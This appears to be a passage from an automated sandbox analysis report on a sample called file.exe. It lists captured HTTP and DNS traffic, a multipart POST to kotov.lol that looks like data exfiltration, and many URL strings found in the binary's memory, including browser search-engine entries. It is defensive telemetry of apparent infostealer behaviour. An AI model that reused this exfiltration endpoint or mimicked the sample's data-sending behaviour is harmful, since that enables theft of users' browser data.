Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1u24yb.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /b2?rn=1732879686233&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0D52E8701DB86AF23F08FD361CDF6BCA&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1D1a855ad4f7b332cc35e551732879687; XID=1D1a855ad4f7b332cc35e551732879687
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1732879686233&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=ecdf21827ba149bbbcdd7ab6ae707f63&activityId=ecdf21827ba149bbbcdd7ab6ae707f63&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=1956C2ECABBF4BD89972CE41F155F45C&MUID=0D52E8701DB86AF23F08FD361CDF6BCA HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0D52E8701DB86AF23F08FD361CDF6BCA; _EDGE_S=F=1&SID=32CC7631662568C00EBA637767AF6931; _EDGE_V=1; SM=T
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=0D52E8701DB86AF23F08FD361CDF6BCA&bcnt=1&placement=88000244&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=-5438092865908489856&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&asid=c12382b3d316466c9e11010216d8d4e5 HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0D52E8701DB86AF23F08FD361CDF6BCA; _EDGE_S=F=1&SID=32CC7631662568C00EBA637767AF6931; _EDGE_V=1; _C_ETH=1; msnup=
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1msDBP.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1msFQA.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1msKSh.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ollo6842okoMZC9&MD=Sx6+nVES HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1733484478&P2=404&P3=2&P4=g4o8az3cVEuio76DbwsVVZ7ibW0x%2fl4QMZmewGefgJnemsosb31FdH%2fSZ0hpoZL3Zx5ucJpTHDSxAK79Rzs%2fkg%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: /UyMBl3yliqo/UW+eahdDCSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8

Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr

String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: kotov.lol
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic	DNS traffic detected: DNS query: assets.msn.com
Source: global traffic	DNS traffic detected: DNS query: c.msn.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDAFIEHIEGDHIDGDGHDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: kotov.lolContent-Length: 255Connection: Keep-AliveCache-Control: no-cache

Source: file.exe, 00000000.00000002.2645583366.000000000376C000.00000004.00000020.00020000.00000000.sdmp, IJJKKJ.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 2cc80dabc69f58b6_1.10.dr	String found in binary or memory: https://assets.msn.cn/resolver/
Source: 1926aa11-c77c-465f-b97d-a31092fa34d6.tmp.11.dr	String found in binary or memory: https://assets.msn.com
Source: 2cc80dabc69f58b6_1.10.dr	String found in binary or memory: https://assets.msn.com/resolver/
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://bard.google.com/
Source: 2cc80dabc69f58b6_1.10.dr	String found in binary or memory: https://bit.ly/wb-precache
Source: file.exe, 00000000.00000002.2645583366.000000000372F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2643455185.0000000000842000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2647094626.0000000003BC7000.00000004.00000020.00020000.00000000.sdmp, BGHJEB.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: file.exe, 00000000.00000002.2645583366.000000000372F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2643455185.0000000000842000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2647094626.0000000003BC7000.00000004.00000020.00020000.00000000.sdmp, BGHJEB.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: 2cc80dabc69f58b6_1.10.dr	String found in binary or memory: https://browser.events.data.msn.cn/
Source: 2cc80dabc69f58b6_1.10.dr	String found in binary or memory: https://browser.events.data.msn.com/
Source: Reporting and NEL.11.dr	String found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
Source: 2cc80dabc69f58b6_1.10.dr	String found in binary or memory: https://c.msn.com/
Source: file.exe, 00000000.00000002.2645583366.000000000376C000.00000004.00000020.00020000.00000000.sdmp, IJJKKJ.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.2647094626.0000000003B2A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2645583366.000000000376C000.00000004.00000020.00020000.00000000.sdmp, IJJKKJ.0.dr, Web Data.10.dr, GCFCFC.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.2647094626.0000000003B2A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2645583366.000000000376C000.00000004.00000020.00020000.00000000.sdmp, IJJKKJ.0.dr, Web Data.10.dr, GCFCFC.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: manifest.json0.10.dr	String found in binary or memory: https://chrome.google.com/webstore/
Source: manifest.json0.10.dr	String found in binary or memory: https://chromewebstore.google.com/
Source: 1926aa11-c77c-465f-b97d-a31092fa34d6.tmp.11.dr	String found in binary or memory: https://clients2.google.com
Source: manifest.json.10.dr	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 1926aa11-c77c-465f-b97d-a31092fa34d6.tmp.11.dr	String found in binary or memory: https://clients2.googleusercontent.com
Source: file.exe, 00000000.00000002.2645583366.000000000372F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2643455185.0000000000842000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2647094626.0000000003BC7000.00000004.00000020.00020000.00000000.sdmp, BGHJEB.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: file.exe, 00000000.00000002.2645583366.000000000372F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2643455185.0000000000842000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2647094626.0000000003BC7000.00000004.00000020.00020000.00000000.sdmp, BGHJEB.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Reporting and NEL.11.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: manifest.json.10.dr	String found in binary or memory: https://docs.google.com/
Source: manifest.json.10.dr	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: manifest.json.10.dr	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: manifest.json.10.dr	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: manifest.json.10.dr	String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: manifest.json.10.dr	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: manifest.json.10.dr	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: manifest.json.10.dr	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: manifest.json.10.dr	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: manifest.json.10.dr	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: manifest.json.10.dr	String found in binary or memory: https://drive-staging.corp.google.com/
Source: manifest.json.10.dr	String found in binary or memory: https://drive.google.com/
Source: file.exe, 00000000.00000002.2647094626.0000000003B2A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2645583366.000000000376C000.00000004.00000020.00020000.00000000.sdmp, IJJKKJ.0.dr, Web Data.10.dr, GCFCFC.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000002.2647094626.0000000003B2A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2645583366.000000000376C000.00000004.00000020.00020000.00000000.sdmp, IJJKKJ.0.dr, Web Data.10.dr, GCFCFC.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000002.2647094626.0000000003B2A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2645583366.000000000376C000.00000004.00000020.00020000.00000000.sdmp, IJJKKJ.0.dr, Web Data.10.dr, GCFCFC.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 1926aa11-c77c-465f-b97d-a31092fa34d6.tmp.11.dr	String found in binary or memory: https://edgeassetservice.azureedge.net
Source: 000003.log4.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
Source: 000003.log4.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
Source: 000003.log6.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
Source: HubApps Icons.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
Source: HubApps Icons.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr, HubApps Icons.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
Source: ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
